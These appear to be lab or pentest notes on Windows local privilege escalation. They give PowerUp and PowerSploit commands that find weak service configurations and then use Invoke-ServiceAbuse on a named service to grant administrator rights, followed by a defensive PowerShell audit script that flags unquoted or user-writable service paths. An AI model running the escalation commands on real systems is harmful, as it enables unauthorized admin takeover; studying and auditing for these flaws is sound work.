Local Privilege Escalation

PowerUp:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1

Get services with unquoted paths and a space in their executable path:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted -Verbose

Get services where the current user can write to the service's binary path:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService -Verbose

Get the services which the current user can modify:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService -Verbose

Get the services where the current user can write to the service's binary path:

A lot more in output.

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-WmiObject -class win32_service | fl *

A lot more in output.

Now run all checks:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Invoke-AllChecks

Now, in another PowerShell session:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> . .\PowerUp.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-AllChecks

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> help Invoke-ServiceAbuse

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> help Invoke-ServiceAbuse -Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-ServiceAbuse -Name AJRouter -UserName 'SECURITY\administrator'

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> net localgroup administrators
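
The first two conditions checked above (unquoted service paths containing a space, and service binaries writable by ordinary users) can also be audited from the defender's side with built-in cmdlets only. The script below is an added example, not part of PowerUp or PowerSploit and not from the original notes; the `$lowPriv` list is an assumed set of low-privileged principals (English names) that you should adapt to your environment.

```powershell
# Added example: audit service image paths for the misconfigurations above.
# Run from an elevated session so every service binary's ACL can be read.
$lowPriv   = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'  # assumption
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership'

Get-CimInstance -ClassName Win32_Service | Where-Object PathName | ForEach-Object {
    $svc = $_
    $raw = $svc.PathName.Trim()

    # Split the image path from its arguments: quoted form first, then bare "....exe".
    if     ($raw -match '^"([^"]+)"')  { $exe = $Matches[1]; $quoted = $true  }
    elseif ($raw -match '^(.+?\.exe)') { $exe = $Matches[1]; $quoted = $false }
    else   { return }                  # not an .exe image path; skip this service

    $unquotedWithSpace = (-not $quoted) -and ($exe -match '\s')

    # Low-privileged principals holding an Allow ACE with write-type rights on the binary.
    $writers = @()
    if (Test-Path -LiteralPath $exe) {
        $writers = @((Get-Acl -LiteralPath $exe).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $_.IdentityReference.Value -and
            (([int]$_.FileSystemRights) -band ([int]$writeBits)) -ne 0
        } | ForEach-Object { $_.IdentityReference.Value } | Select-Object -Unique)
    }

    if ($unquotedWithSpace -or $writers.Count -gt 0) {
        # Proposed corrected ImagePath: quote the executable, keep the arguments as-is.
        $fix = if ($unquotedWithSpace) { '"{0}"{1}' -f $exe, $raw.Substring($exe.Length) } else { $null }
        [pscustomobject]@{
            Service           = $svc.Name
            RunsAs            = $svc.StartName
            StartMode         = $svc.StartMode
            UnquotedWithSpace = $unquotedWithSpace
            LowPrivWriters    = $writers -join ', '
            CurrentPath       = $raw
            SuggestedPath     = $fix
        }
    }
} | Format-List
```

For each finding, apply `SuggestedPath` to the service's `ImagePath` value under `HKLM\SYSTEM\CurrentControlSet\Services\<service name>`, and remove the write-type ACEs listed in `LowPrivWriters` from the binary.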

@Saksham Dixit